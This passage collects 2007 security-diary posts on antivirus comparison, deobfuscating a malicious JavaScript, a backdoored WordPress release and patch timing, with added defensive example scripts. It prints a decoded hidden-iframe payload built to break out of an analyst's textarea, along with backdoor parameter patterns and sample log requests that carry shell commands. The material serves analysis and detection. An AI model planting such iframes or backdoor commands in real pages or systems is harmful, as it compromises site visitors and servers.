Obviously some vendors are absent from these results.

Virustotal keeps some limited statistics online, but they're not useful in comparing products.

Build your own

Now, if you collect enough of these, you might build your own statistics on which product detects the things you encounter better than the competition. It's not easy to collect enough of them to get a statistically significant sample, so running 2 or more of your favorite scanners in-house might be an easier way to get more significant results (but more limited in scope).

Getting enough malware to scan could be done using proxy logs, stripped email attachments etc. Do take care with local privacy rules/laws before doing this!
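An added example of the "build your own" idea (not from the diary): a Python script that parses VirusTotal listings in the layout shown above, counts per vendor how many of your samples it caught, and also measures what two engines catch together, which is the argument made further down for running a different product on the mail gateway than on the desktops. The first listing is an excerpt of the ccc.exe report above; the second listing, its sample name and its detection names are constructed.

```python
import re
from collections import defaultdict

DATE_RE = re.compile(r"^\d{8}$")      # the Update column: YYYYMMDD

# First block: excerpt of the ccc.exe listing from the diary above.
# Second block: constructed listing for a hypothetical second sample.
SAMPLES = {
    "ccc.exe": """\
Antivirus Version Update Result
AntiVir 20070305 TR/Dldr.Small.ego.55
Authentium 4.93.8 20070305 -
Avast 4.7.936.0 20070305 -
AVG 20070305 Downloader.Generic3.VCI
BitDefender 7.2 20070305 Dropped:Trojan.Rootkit.AN
ClamAV devel-20060426 20070305 -
Kaspersky 20070305 Trojan-Downloader.Win32.Small.ego
McAfee 4976 20070305 -
Microsoft 1.2204 20070305 -
NOD32v2 2097 20070305 Win32/Wigon.K
Sophos 4.15.0 20070305 Troj/Agent-ECZ
Symantec 10 20070306 -

Name ccc.exe
md5 46241d432831fec22fd38c135ab96523
""",
    "constructed-sample.exe": """\
Antivirus Version Update Result
AntiVir 20070306 -
Authentium 4.93.8 20070306 W32/Constructed.A
Avast 4.7.936.0 20070306 -
AVG 20070306 -
BitDefender 7.2 20070306 Trojan.Constructed.B
ClamAV devel-20060426 20070306 Trojan.Constructed
Kaspersky 20070306 Trojan.Win32.Constructed.a
McAfee 4977 20070306 W32/Constructed.gen
Microsoft 1.2204 20070306 -
NOD32v2 2098 20070306 Win32/Constructed.A
Sophos 4.15.0 20070306 -
Symantec 10 20070306 Trojan.Constructed
""",
}


def parse_report(text):
    """Map vendor -> detection name, or None when the Result column is '-'.
    A line counts as a result row when its second-to-last token is a date,
    which skips the header, blank lines and the file-metadata block."""
    results = {}
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) < 3 or not DATE_RE.match(tokens[-2]):
            continue
        vendor, result = tokens[0], tokens[-1]   # version (tokens[1:-2]) may be empty
        results[vendor] = None if result == "-" else result
    return results


def detection_rates(reports):
    """reports: {sample_name: parsed report}. Returns {vendor: (hits, scanned)}."""
    hits, scanned = defaultdict(int), defaultdict(int)
    for report in reports.values():
        for vendor, name in report.items():
            scanned[vendor] += 1
            if name is not None:
                hits[vendor] += 1
    return {v: (hits[v], scanned[v]) for v in scanned}


def combined_coverage(reports, vendors):
    """Samples caught by at least one of the given engines, as (hits, total)."""
    caught = sum(1 for r in reports.values() if any(r.get(v) for v in vendors))
    return caught, len(reports)


if __name__ == "__main__":
    parsed = {name: parse_report(text) for name, text in SAMPLES.items()}
    for vendor, (h, n) in sorted(detection_rates(parsed).items()):
        print("%-12s %d/%d" % (vendor, h, n))
    print("Sophos or McAfee:", combined_coverage(parsed, ["Sophos", "McAfee"]))
```

With two samples the numbers mean nothing, which is the point made above about sample size; the script only becomes useful once you feed it listings for everything your proxy and mail gateway have handed you over a few months.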

3rd Party Reports

There are some reports available about 3rd party testing of anti-virus products.

  • www.av-comparatives.org: updated every so often, includes a rating system.
  • www.pcworld.com: article, more than a year old.
  • www.av-test.org: runs out of a German University, not updated recently
  • www.virus.gr: last updated in August 2006
  • Consumer Reports has a comparison of 12 anti-virus products (subscribers only), it did get heavy negative feedback from the anti-virus vendors who seem not to like being put to the test.
  • Virus bulletin has a report online for registered users and is referenced by many of our readers.
  • Some more comparisons can be found at  antivirus-software.topchoicereviews.com and  www.consumersearch.com


What should anti-virus products be evaluated on? A test with the well-known EICAR test file, to see whether it is detected, will not expose the strengths and weaknesses of the different products or let us make a choice. Depending on the specific situation, we can be interested in:

  • Few false positives: detecting known good software as malicious, and crippling systems as a result, has happened before; the cost of recovering from this should not be underestimated. While looking forward is hard, the hindsight view might tell its own tale.
  • Few false negatives: not detecting malware is a bad thing, but it does happen by default in a technology that is basically reactive, and where those creating the malware actually test their contraptions against the anti-virus products to make sure they are not detected at the time they release them.
  • Timely signature updates: signature updates are the main way anti-virus software fixes the two problems above. The faster they are released, the more protection you get as a customer.
  • In corporate settings we want excellent centralized management. This should at least include a report that points us to individual machines not updating their definitions at all or in a timely manner. Ideally it does this without blocking signature updates when the roaming laptops are not connected to the corporate network or a VPN back to the office.
  • Few vulnerabilities: Vulnerabilities in our security solutions are somewhat of a nightmare as they not only fail in their goal of making us more secure but also introduce more security problems.
  • We do want variety if possible so that we use different engines in the different roles by e.g. using a different vendor on our email infrastructure and the desktops. The same goes for desktops and file servers.
  • Ease of use.
  • Price
  • ...

With thanks to epablo, Vincent,  Bryan, William, and many others for contributing to this diary

Swa Frantzen -- NET2S



Published: 2007-03-05

Security update for QuickTime (7.1.5)

Apple released a new version of QuickTime (7.1.5) which contains numerous bug fixes and a lot of important security patches. This article (http://docs.info.apple.com/article.html?artnum=305149) lists the security content of this release – you can see that it fixes 8 security vulnerabilities, all of which just require a user to click on a specially crafted file.

If you use QuickTime I would definitely recommend that you install the update as soon as possible as some of those security vulnerabilities look nasty.

You can find the Mac version at http://www.apple.com/quicktime/download/mac.html, while the Windows version can be downloaded from http://www.apple.com/quicktime/download/win.html.


Published: 2007-03-05

phpMyFAQ being exploited

A vulnerability in phpMyFAQ, an open source FAQ system for PHP and various databases, was published back in February (http://www.phpmyfaq.de/advisory_2007-02-18.php).
Jeremy notified us that this is being exploited in the wild. The vulnerability allows an attacker to upload arbitrary files to the server. As you can probably guess, attackers currently first upload a PHP shell, after which the machine is typically turned into a spam-spitting server.

If you are using phpMyFAQ, be sure to install the updates available on their web site (http://www.phpmyfaq.de/).


Published: 2007-03-05

JavaScript traps for analysts

On Friday, Lorna posted a diary (http://isc.sans.org/diary.html?storyid=2325) about some malware we received that day. A compromised site hosted an obfuscated JavaScript program – a typical scenario you might say.
Over the weekend I received a couple of e-mails from our readers asking how to deobfuscate that JavaScript, so I spent more time analyzing it and found some very interesting details and traps that are almost directly related to the nice diary Daniel posted a couple of weeks ago (http://isc.sans.org/diary.html?storyid=2268).

If you haven’t read Daniel’s diary I recommend you definitely do so. Daniel showed 4 typical methods that you can use when analyzing obfuscated JavaScript programs. As you will see, of those 4 methods, 3 will fail on this example!

The JavaScript file that we will analyze is nicely obfuscated, as you can see below:

Malicious JavaScript program

As with most similar obfuscation attempts, first a function is defined, called OAEC86 (as you will see, absolutely all variables have similar names, which makes them more difficult for a human to read). At the end, that function is called with a big string as the input parameter (the obfuscated content).

Replacing document.write() with alert()

So, we have to analyze what the OAEC86 function does. As you can see on the screenshot above, the function ends with a call to document.write(), which causes your browser to execute the (deobfuscated) code. If you try to approach this with method 1 from Daniel’s diary (replace document.write() calls with alert()) and start the JavaScript program, your browser will appear to hang and you will have to kill it with Task Manager. We will see later why that happens, but let’s analyze the function itself first.

As the code has been stripped of spaces, it’s difficult to analyze, so I added some spaces and tabs to make it more human readable. There is one interesting variable that gets declared immediately at the beginning of the function:

var A112FA=arguments.callee.toString().replace(/\W/g,"").toUpperCase();

When I saw this I immediately remembered another diary I wrote some time ago (http://isc.sans.org/diary.html?storyid=1519), when I analyzed a similar thing, but this one goes a bit further.
So, the variable above gets its content from the arguments.callee.toString() call. This function returns a text string which contains the whole called function, from the first line to the last. Something I found before was that there was a big difference between Internet Explorer and Mozilla in their handling of white space; however, as you can see in the example above, that doesn’t matter here, as all non-word characters are stripped out with the replace() call (\W) and the result is then converted to upper case. It's nice to see how the attackers fixed this so it works correctly (from their point of view) in both IE and Mozilla.
So, after executing this call, the variable A112FA will contain the following string: “FUNCTION0AEC86T1F0AVARA112FA…”. You can see the beginning part of the code here.

As you can probably guess at this point in time, the function actually uses itself to deobfuscate the content. This way the author made sure that you can not change the function. However, this still doesn’t explain why the browser hangs when you change the document.write() call to alert(). The answer lies further down.

Without analyzing every line of the code (that’s left as an exercise for you, if you are interested in this area), I’ll just explain why the browser hangs.
The big for loop in the code performs various permutations which deobfuscate the code. There is a while() loop in the code as well, which keeps looping as long as the Q3A988 variable is different from zero. Now, when you change the document.write() call to alert(), this while() loop keeps looping (as Q3A988 will never become zero), which in turn causes your browser to hang.
So the first method from the original diary is a no go here. Let's try the second method.

Beware of </textarea>

Now, as the first method failed, you might want to try Tom Liston’s <textarea> method. First of all, I hope that you are aware that whenever you run code like this that you should do it in an isolated environment because you are running live, potentially malicious code. This is even more important in this case.

I’ll skip right to the point – when this program is deobfuscated, the result will be this:

</textarea><iframe src="http://[REMOVED]" width=1 height=1 style="border: 0px"></iframe>

What does this do? It closes the <textarea> tag that you might have put before it. In other words, if you were running this in your browser and you used method 2), you would actually execute the malicious code! It is obvious that the author of this code came prepared for analysts!
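Why the trap works, and the one-line fix, as an added Python example (mine, not from the diary): method 2 pastes the decoded output between textarea tags verbatim, so a closing tag inside the output ends the textarea early and the iframe that follows is parsed as live markup; HTML-escaping the output before wrapping it keeps the whole thing inert text. The decoded line is the one shown above, the function names are my own, and the break-out check is a simple pattern match rather than a full HTML parser.

```python
import html
import re

# The deobfuscated output shown in the diary (the host was already removed there).
TRAP = ('</textarea><iframe src="http://[REMOVED]" width=1 height=1 '
        'style="border: 0px"></iframe>')

# A closing textarea tag anywhere inside the displayed content is the break-out.
CLOSING_TAG = re.compile(r"</textarea", re.IGNORECASE)


def naive_textarea(decoded):
    """Method 2 as practised: paste the decoded output between the tags."""
    return "<textarea>" + decoded + "</textarea>"


def safe_textarea(decoded):
    """Escape the output first, so nothing in it can be parsed as a tag."""
    return "<textarea>" + html.escape(decoded, quote=True) + "</textarea>"


def breaks_out(page):
    """True when a closing textarea tag appears before our own closing tag,
    i.e. when the browser would stop treating the content as plain text."""
    body = page[len("<textarea>"):-len("</textarea>")]
    return CLOSING_TAG.search(body) is not None


if __name__ == "__main__":
    print("naive breaks out:", breaks_out(naive_textarea(TRAP)))   # True
    print("safe breaks out: ", breaks_out(safe_textarea(TRAP)))    # False
    print(safe_textarea(TRAP))
```

The escaped version still shows the analyst exactly what was decoded, including the iframe, which is all the textarea method was ever meant to do.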

Next to method 3). In this case, method 3) isn’t really applicable as the deobfuscation code is way too complex to be rewritten in perl (if you really do it let me know).
So what are we left with? Method 4, or (my favourite), a debugger.

Defeating the obfuscation

One relatively easy way to deobfuscate this is to use SpiderMonkey, which is Mozilla’s JavaScript engine released as a standalone. It will not work just out of the box, though, as the JavaScript engine will not know what to do with document.write(), but folks at Websense wrote two nice JavaScript programs that you can use so you don’t have to replace any document.write() calls. Their method is explained at http://www.websense.com/securitylabs/blog/blog.php?BlogID=98, it’s a nice read that I definitely recommend.

I personally prefer to look at things with a debugger, though, so I’ll explain how to do this with Rhino. Rhino is Mozilla’s JavaScript debugger. It has a nice GUI and is written in Java, so it will work on any platform. You just have to make sure that you have a JRE installed.
A lot of users have problems starting it – you have to make sure that your Java classpath will be set to js.jar file that comes with Rhino, otherwise Java will not know how to find the class it needs. In the example below, I’ve extracted Rhino in the D:\Rhino directory and the malicious JavaScript file (with all HTML tags stripped out) is in d:\malware.js. Rhino should be started with the following command:

D:> java -classpath D:\Rhino\js.jar org.mozilla.javascript.tools.debugger.Main D:\malware.js

This will open a nice GUI window that is pretty much self explanatory. It is advised that you make the code human readable before this, as that will allow you to set breakpoints more easily – and as we’ve seen, in this case you can do it, as the deobfuscation function strips out white space anyway.
You can now either step through the program, debug it and see how it works, or simply set a break point on the document.write() call and then inspect the I4D790 variable, as shown below:

Rhino JavaScript Debugger

You can see that it contains the code that would have been executed in the browser.

As we saw, malware authors are definitely improving their work and are, almost certainly, aware of methods that analysts use. In this case, the </textarea> tag was directed against analysts, as it made no other sense in the rest of the code. Luckily, whatever has to run on your machine can be analyzed, but it will probably not be as easy to do that as it was in the past, as malware continues to evolve.


Published: 2007-03-04

Hardware isn't always more trustworthy than software

Last week one of my colleagues mentioned that he found it strange that people always assumed software was the issue when IT-related problems occurred. He hit the nail right on the head: is hardware really more trustworthy?

Polish security researcher Joanna Rutkowska last week gave some good evidence that this need not always hold true. At the Blackhat conference in Washington, DC she showed three different scenarios in which software can fool hardware-based forensic acquisition of RAM memory.

The attacks, while still only theoretical, were developed for the AMD64 platform and could allow software running on a compromised system to cause such tools to crash, read out "garbage" data or in fact present them with fake content. This could make it impossible for a forensic investigator to discover malware in memory, even though it is in fact there.

Intelligence principles have always dictated we need to be very careful where we get our information from, and preferably triangulate it with other sources. Understanding whether the object sourcing us the information has motivation to lie to us, is becoming more and more important. In essence, Joanna shows that DMA (direct memory access) really isn't all that direct, and we need to better understand the limitations of our tools.

Maarten Van Horenbeeck


Published: 2007-03-04

New tool in the fight against malware distribution

The Internet Storm Center often reports on the use of defaced websites in malware distribution. High profile examples such as the recent Dolphin Stadium web site compromise show that web masters have every reason to be very interested in exactly what they are serving up to an ever more mobile and global audience.

Niels Provos recently released a tool, SpyBye, that allows a webmaster to perform exactly such an audit. SpyBye, of which version 0.2 was released yesterday, is a proxy server that analyzes a requested URL, submits any links it finds through a rule based engine (including a list of known malicious sites) and then sorts them into three categories: harmless, unknown or dangerous. A webmaster can install it on his local machine and then access his website to get detail on what exactly is taking place during the connection - that same webmaster, having knowledge of the expected content, will also be able to easily identify content that is suspicious, but could otherwise have been unreadable when obfuscated through some form of URI-encoding.

This new version integrates with ClamAV to automatically scan downloaded files, and can log all requests to syslog. Provos also provides a real-time version of the proxy so you can give it a try on-line. Note that it is still best to run any assessment of potentially dangerous content from a virtual machine, as the tool will continue to feed the results of requests classified as 'harmless' or 'unknown' to your browser.
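The classification step described above, as an added example that is not SpyBye's own code: every tag that loads remote content is resolved against the page URL and placed in one of the three categories by host, and iframes that are sized 0x0 or hidden by style are flagged separately, since an invisible frame to an unknown host is the injected-malware pattern the diary is worried about. The allowlist, blocklist and sample page are all constructed for this example (the hosts under .invalid are placeholders, not real sites).

```javascript
// Added example: a SpyBye-style audit of the resources a page pulls in.
// Each src/data reference is resolved, then classified as harmless (known-good
// host), dangerous (known-bad host) or unknown. Hidden iframes are flagged on
// top of that. Lists and sample page are constructed, not real data.

const KNOWN_GOOD = new Set(['www.example.com', 'static.example.com']); // hypothetical allowlist
const KNOWN_BAD = new Set(['www.trudomain.invalid']);                  // hypothetical blocklist

// Constructed sample: a webmaster's own page with one injected hidden iframe.
const SAMPLE_PAGE = `
<html><head>
<script src="/js/menu.js"></script>
</head><body>
<img src="http://static.example.com/logo.gif">
<script src="http://counter.unknown-host.invalid/c.js"></script>
<iframe src="http://www.trudomain.invalid/hello.html" width=0 height=0></iframe>
</body></html>`;

// Pull every tag that loads remote content together with its source attribute.
function extractReferences(html, pageUrl) {
  const refs = [];
  const tagRe = /<(iframe|frame|script|img|embed|object)\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    const attrs = m[2];
    const srcRe = tag === 'object'
      ? /\bdata\s*=\s*["']?([^"'\s>]+)/i
      : /\bsrc\s*=\s*["']?([^"'\s>]+)/i;
    const s = srcRe.exec(attrs);
    if (!s) continue;
    let url;
    try { url = new URL(s[1], pageUrl); } catch (e) { continue; } // skip unparsable values
    // A 0x0 or display:none frame is invisible to the visitor but still loads.
    const hidden = tag === 'iframe' &&
      /\b(width|height)\s*=\s*["']?0\b|display\s*:\s*none/i.test(attrs);
    refs.push({ tag, url: url.href, host: url.hostname, hidden });
  }
  return refs;
}

function classify(host) {
  if (KNOWN_BAD.has(host)) return 'dangerous';
  if (KNOWN_GOOD.has(host)) return 'harmless';
  return 'unknown';
}

// One verdict per reference; a proxy built around this decides what to do
// with 'unknown' and 'dangerous' entries (SpyBye keeps feeding the first two
// categories to the browser, which is why the diary says to run it in a VM).
function auditPage(html, pageUrl) {
  return extractReferences(html, pageUrl).map(r => ({ ...r, verdict: classify(r.host) }));
}

// Stand-alone run: print the audit of the constructed page.
for (const r of auditPage(SAMPLE_PAGE, 'http://www.example.com/index.html')) {
  console.log(`${r.verdict.padEnd(9)} ${r.tag.padEnd(6)} ${r.hidden ? 'HIDDEN ' : ''}${r.url}`);
}
```

On the constructed page the two references to the site's own hosts come back harmless, the third-party counter script is unknown (exactly the kind of entry a webmaster who knows his own content can judge at a glance), and the injected 0x0 iframe is both dangerous and hidden.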

Link: Monkey.org


Published: 2007-03-04

Wordpress 2.1.1 source backdoored

The Wordpress development team has posted a notification on their blog that version 2.1.1 of Wordpress was compromised: code was added that allows remote code execution. This happened through a user-level compromise of one of their servers.

While not all 2.1.1 downloads were affected, they advise everyone running this version to upgrade to version 2.1.2 immediately. That version has been fully verified and is not backdoored. If you cannot upgrade right away, at least compare your copies of theme.php and feed.php against a clean 2.1.2 download.

By way of mitigation, hosting providers that do not know which Wordpress versions are running across their user base may wish to block requests to theme.php and feed.php that carry a query string containing 'ix=' or 'iz='.
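The same pattern can be run over existing access logs to find out whether anyone has already used the backdoor. The following is an added example, not code from Wordpress or any hosting provider: it parses Apache combined-format lines, percent-decodes parameter names before matching (so that "%69%78=" is recognised as "ix="), and reports the source address and payload of every hit. The log lines are constructed, and the /wp-includes/ directory is an assumption about where the two files live.

```javascript
// Added example: find requests matching the Wordpress 2.1.1 backdoor pattern
// (an 'ix' or 'iz' parameter to theme.php or feed.php) in access logs.
// Parameter names are percent-decoded first, because "%69%78" is still "ix"
// to PHP but would slip past a naive grep for "ix=". Sample lines are constructed.

const BACKDOOR_FILES = new Set(['theme.php', 'feed.php']);
const BACKDOOR_PARAMS = new Set(['ix', 'iz']);

// Constructed Apache combined-format lines (addresses from documentation ranges).
const SAMPLE_LOG = [
  '203.0.113.7 - - [04/Mar/2007:10:12:01 +0000] "GET /wp-content/themes/default/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [04/Mar/2007:10:12:05 +0000] "GET /wp-includes/theme.php?iz=ls%20-la HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [04/Mar/2007:10:14:33 +0000] "GET /wp-includes/feed.php?ix=uname%20-a HTTP/1.0" 200 87 "-" "curl/7.15.5"',
  '198.51.100.9 - - [04/Mar/2007:10:15:02 +0000] "POST /wp-includes/feed.php?%69%78=id HTTP/1.0" 200 40 "-" "curl/7.15.5"',
  '192.0.2.44 - - [04/Mar/2007:10:16:10 +0000] "GET /wp-includes/feed.php?feed=rss2 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
  '192.0.2.44 - - [04/Mar/2007:10:16:11 +0000] "GET /wp-includes/feed.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
];

// Percent-decode, keeping malformed input as-is rather than throwing.
function safeDecode(s) {
  try { return decodeURIComponent(s.replace(/\+/g, ' ')); } catch (e) { return s; }
}

// Split "a=1&b=2" into [{name, value}] with both halves decoded.
function parseQuery(query) {
  return query.split('&').filter(Boolean).map(pair => {
    const i = pair.indexOf('=');
    return i < 0
      ? { name: safeDecode(pair), value: '' }
      : { name: safeDecode(pair.slice(0, i)), value: safeDecode(pair.slice(i + 1)) };
  });
}

// One hit per matching request: who, when, which file, which parameter, what payload.
function scanLog(lines) {
  const reqRe = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"/;
  const hits = [];
  for (const line of lines) {
    const m = reqRe.exec(line);
    if (!m) continue;
    const [, ip, when, method, target] = m;
    const q = target.indexOf('?');
    if (q < 0) continue;                              // no query string, cannot match
    const path = target.slice(0, q);
    const file = path.slice(path.lastIndexOf('/') + 1).toLowerCase();
    if (!BACKDOOR_FILES.has(file)) continue;
    for (const p of parseQuery(target.slice(q + 1))) {
      const name = p.name.toLowerCase();
      if (BACKDOOR_PARAMS.has(name)) hits.push({ ip, when, method, file, param: name, value: p.value });
    }
  }
  return hits;
}

for (const h of scanLog(SAMPLE_LOG)) {
  console.log(`${h.when} ${h.ip} ${h.method} ${h.file} ${h.param}=${JSON.stringify(h.value)}`);
}
```

Three of the six constructed lines are hits; the ordinary feed request with a "feed=" parameter and the request without a query string are not. A blocking rule at the web server should be written with the same encoding caveat in mind: matching the literal string "ix=" in the raw request line misses the encoded form.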

More information: Wordpress.org


Published: 2007-03-03

Twilight zone: the time between vulnerability and patch installation

A little more than one week from now Microsoft will be releasing their monthly security updates. A recent security standard stated fairly bluntly that “relevant security patches need to be installed within one month of release”. Other standards are much less specific and define regulations regarding process, but not necessarily result. Perhaps today makes for a good time to have a look at patch management in general.

Good patch management is rooted in understanding your assets and understanding the threats. An organization needs a correct and up-to-date configuration management database, as well as a way of learning about new vulnerabilities and patches. Many vendors now offer ‘security intelligence’ services that provide prior notice of security vulnerabilities, and most of this information can also be obtained from open sources – such as this website. Patch information is generally available as part of a maintenance contract with software and hardware vendors.

The difficulties usually lie in understanding our own organization. An open question of many security professionals is how we can get sufficient understanding of both the tools that have been deployed legitimately for business reasons and of any software that has been installed – perhaps illegitimately - by end users. Even though eloquently formatted policy statements may forbid installation of unsupported software, these statements are of little use should such a tool lead to a significant compromise.

Software can be used to assist: tools such as Microsoft’s Systems Management Server can support central management of legitimate software, while vulnerability scanners such as Nessus, simple port enumeration tools or dedicated software agents can be employed to do enterprise software discovery of those less predictable assets.

By correlating deployed software with new vulnerabilities and engaging in thorough risk analysis, an organization can identify the importance of each issue and decide on the required response time. However, not every vendor releases its patches according to a fixed schedule, and a new critical patch may be released on any given day. As such, patches can rarely be installed immediately. New patches are usually first reviewed by an information security team that may not have decision power over the availability of crucial business assets. Even if it did, the patches would need to be tested on quality assurance systems prior to deployment on business systems.

Our organization will need to mitigate the risk posed by the security vulnerability prior to the installation of a patch. This matches real-life security risk management: when there is indication of an imminent threat, the decision is often made to add monitoring, to enable either quicker response or outright prevention. The problems European travellers experienced in August last year when passing through London Heathrow after the discovery of a bombing plot serve as a good example. During the initial, highly costly monitoring phase, longer-term solutions were investigated and prepared for implementation, in this case the complete ban on liquids on board and accelerated development of technology to detect liquid explosives.

From my experience with how organizations deal with patches, I've noticed that not too many of them are actually prepared to evaluate what they can do to mitigate an INFOSEC threat prior to the implementation of a patch. This component of vulnerability management is however becoming more and more important: recent examples have confirmed that for some vulnerabilities an exploit was in fact released some time before the patch.

One major vendor recently had a good idea in this respect. As part of their security advisories, they started releasing “Applied Intelligence Response” bulletins. These provide information on actions that can be taken to mitigate a certain vulnerability, but also provide hints on how to detect exploitation in progress. An organization that is still scheduling the deployment of a required fix, for example, now has the opportunity to deploy network-wide monitoring and hook this into their incident response process.

Do you have any stories or hints you want to share on how you or your organization deals with the time between vulnerability and patch installation? Get in touch!

Maarten Van Horenbeeck


Published: 2007-03-03

DST and time sensitive transactions

We've raised the Daylight Saving Time (DST) changes in the US a couple of times.  First when Microsoft pushed out a patch back in November 2006 and again in January when it was becoming clear that this might slip past a lot of people. 

It was raised again this week, with March 11 getting closer,  when we were requested to provide some comment on the impact of the early change.  

One of the impacts was raised in a field notice from Cisco (FN - 62663 - U.S. Daylight Savings Time Policy Changes Effective March 2007 - for ACS Windows). Cisco's Secure Access Control Server (ACS) provides authentication services through RADIUS and TACACS+ and is used in Kerberos-based deployments. Kerberos tolerates only a small clock skew between client and server (5 minutes by default), so if the clock on one side is out by an hour, authentication will fail.

No doubt the problem is not limited to this one implementation. There are a number of Single Sign-On (SSO) and two-factor authentication solutions that rely on time, and all of them may have a similar issue.

Other areas where this may be an issue are log records and correlation engines: events from a system that changed on the new date and one that changed on the old date will be an hour apart in the logs for three weeks, which breaks time-based correlation between them.

Quite a number of vendors have been pumping out notifications on this topic the last couple of weeks, you may wish to give them the quick once over, just to double check if your environment will be affected.

Mark H


Published: 2007-03-02

Weekend grab bag

After a somewhat slow day at the Storm Center, I wanted to mention a few issues that we've heard about, but not written about in the last few days.

  1. Joanna Rutkowska was supposed to give a talk on Wednesday at BlackHat DC on a method that could be used to subvert hardware memory access (so rootkits could hide from live response memory captures).  I haven't yet seen any details, but it looks like it could be another fascinating/scary development.  The Dark Reading article is here.
  2. David Litchfield of NGSSoftware.com has released a paper explaining that, contrary to Oracle's past assertions that CREATE PROCEDURE privileges were required for many SQL injection attacks to succeed, merely the ability to connect to the database (the CREATE SESSION privilege) is sufficient.  All the more reason to limit the ability to connect to the database, encrypt the connections, and make sure you are using strong authentication.
  3. The continuing saga of A/V software vulnerable to DoS while attempting to unpack crafted files (previously Symantec, ClamAV and Trend had problems with UPX and Kaspersky with PE) hit Kaspersky again (UPX this time).  Apparently, they actually fixed the problem a month ago, but publicly acknowledged it today, see the posting to the vulnwatch list.
  4. There are a couple of interesting articles this week by folks who have managed to pull browser history without JavaScript.  We've often recommended the NoScript extension for Firefox, but even that isn't enough anymore.  Check out the stories here, here, here, and the "original" one here.


Published: 2007-03-02

Total Lunar Eclipse

I realize this has absolutely nothing to do with infosec....but on Saturday March 3rd there will be a really cool total lunar eclipse.  NASA has the details on their web site.  For most of Asia and the Americas you will see it at moonset or moonrise respectively, Europe and Africa will enjoy it at night.  For our mates in eastern Australia and New Zealand you'll just have to watch it on TV.

So if your systems go haywire this weekend you'll have a good story to blame it on.  "Boss, there was a full moon, a total lunar eclipse, and for all I know sunspots were acting up....."  Your management will have no choice but to believe you.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-03-02

Recent Threat/Vulnerability Developments

There have been a few recent minor developments that I think warrant a mention.

There have been a handful of viruses recently that specifically target USB removable media, Win32.Agent.wj and VBS.Solow.E to mention just two.  This harks back to the old days of floppy-disk boot-sector viruses.  It is not the only old-school revisitation I've seen in malicious code trends; there have also been a few destructive viruses reported recently.

A vulnerability in Adobe Acrobat that allows a malicious PDF file to call arbitrary file:// URLs was announced last night.

Things to keep an eye on over the weekend:

The year of "Month of X Bugs" projects continues with PHP (the Month of PHP Bugs).  Something interesting is bound to turn up out of that.
The college basketball championship begins in the US.  I would be surprised not to see any "March Madness" related schemes develop.


Published: 2007-03-02

Manager/Media Impact

Did your day start off something like this?

Boss-type-person rushes into room waving a print out of New computer virus threatens biz net and demanding to know "what you're doing about it."

Hopefully, you were able to tell them that you'd already deployed the patch for the vulnerability back in November 2006, that your perimeter doesn't allow inbound TCP/2967 or TCP/2968, and that your AV signatures were up-to-date.  Then you should have been able to lean back, put your feet up on the desk and say: "see, this is why you pay me the big bucks -- so you don't appear in CNN articles."

If your day didn't go as smoothly, you have my sympathies.  I spent more time today on conference calls, impromptu hallway meetings, and writing up briefings for what should have been (and so far actually has been) a non-event for our environment.

This is not the first time that I've been impacted by non-event events.  It's why I have to monitor eWeek, so I have a heads-up on what the suits are going to be asking about that morning.

I didn't keep careful track, but one of the many repeated phrases of the day was "Money dot CNN is not going to produce a computer security scoop."  It's possible, just not probable.

I'm proposing we update our impact models expanding them from Confidentiality, Integrity, and Availability to include Management.  I'm joking, but only slightly.  More realistically, I will update our criteria of releasing internal communications to include media/manager impact.  This has happened enough that it needs to become part of my process.


Published: 2007-03-02

Deformed TCP Options - Got Packets?

A reader named John sent us an email about some unusual traffic they are seeing.  I'm curious whether this is isolated or widespread.  Here is a copy of his email describing what they are seeing, along with an example of 5 packets, all destined for different hosts.  If you are seeing this, please let us know, and if you can, send us a packet capture of the traffic.   Thanks!!

Over the past few weeks we have seen an increase in the number of Snort alerts we have been receiving for "Truncated TCP options." Looking at the packets, they appear to be crafted. At first it was one host scanning one of our /16 blocks, then it was another a week later, then one more a couple of days later and then a couple every day. Sometimes these scans are sourced from random ports, but sometimes they are sourced from common ports like 80, 443 and 6667. They have come across as SYN packets, ACK packets (for which there were no initiating SYNs), or SYN/ACKs (again, there were no initiating SYNs). The destination ports are always within the lowest ephemeral ports (1024-1300), and there is no consistency in the OS of the hosts that do respond. Because so few hosts do respond to these packets, I believe that one of the objectives of this scan may be to probe firewall configurations (we have a standing policy requiring host-based firewalls), but it seems the level of crafting involved would be overkill.

When looking at some of the packets, what we see is that the TCP option for MSS appears twice, with the second one running past the end of the packet. When I counted the headers based upon the data in the IP and TCP header fields, it appears these packets are the correct length.

07:11:45.781421 IP (tos 0x0, ttl 113, id 9433, offset 0, flags [DF], proto: TCP (6), length: 48) > www.xxx.yyy.zzz.1229: S, cksum 0x5ed4 (correct), 2627126762:2627126762(0) ack 2577956091 win 1460 <mss 1460,nop,[bad opt]>

0x0000: 4500 0030 24d9 4000 7106 4944 81fa 8015 E..0$.@.q.ID....
0x0010: wwxx XXYY 04e8 04cd 9c96 c5ea 99a8 7cfb ...{..........|.
0x0020: 7012 05b4 5ed4 0000 0204 05b4 0102 0403 p...^...........

07:11:51.517325 IP (tos 0x0, ttl 113, id 21659, offset 0, flags [DF], proto: TCP (6), length: 48) > www.xxx.yyy.zzz.1070: S, cksum 0xa40c (correct), 1381904945:1381904945(0) ack 2301854615 win 1460 <mss 1460,nop,[bad opt]>

0x0000: 4500 0030 549b 4000 7106 764c 81fa 8015 E..0T.@.q.vL....
0x0010: wwxx XXYY 04e4 042e 525e 3231 8933 8397 ........R^21.3..
0x0020: 7012 05b4 a40c 0000 0204 05b4 0102 0403 p...............

07:12:06.816985 IP (tos 0x0, ttl 113, id 5274, offset 0, flags [DF], proto: TCP (6), length: 48) > www.xxx.yyy.zzz.1132: S, cksum 0x90a5 (correct), 404326101:404326101(0) ack 1227691954 win 1460 <mss 1460,nop,[bad opt]>

0x0000: 4500 0030 149a 4000 7106 10d2 81fa 8015 E..0..@.q.......
0x0010: wwxx XXYY 041e 046c 1819 86d5 492d 17b2 ..b,...l....I-..
0x0020: 7012 05b4 90a5 0000 0204 05b4 0102 0403 p...............

